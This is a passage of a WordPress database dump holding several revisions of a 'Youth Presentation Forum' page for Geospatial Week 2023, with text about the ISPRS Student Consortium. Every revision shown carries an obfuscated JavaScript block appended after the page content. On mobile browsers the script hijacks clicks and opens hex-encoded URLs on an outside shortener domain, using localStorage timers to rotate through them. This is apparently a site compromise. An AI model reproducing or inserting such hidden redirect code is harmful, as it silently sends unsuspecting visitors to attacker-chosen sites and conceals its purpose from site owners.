_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:52:37','2023-01-22 04:52:37','',3613,'https://gsw2023.com/?p=3623',0,'revision','',0),
(3624,1,'2023-01-22 04:53:18','2023-01-22 04:53:18','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:53:18','2023-01-22 04:53:18','',3613,'https://gsw2023.com/?p=3624',0,'revision','',0),
(3625,1,'2023-01-22 04:56:09','2023-01-22 04:56:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 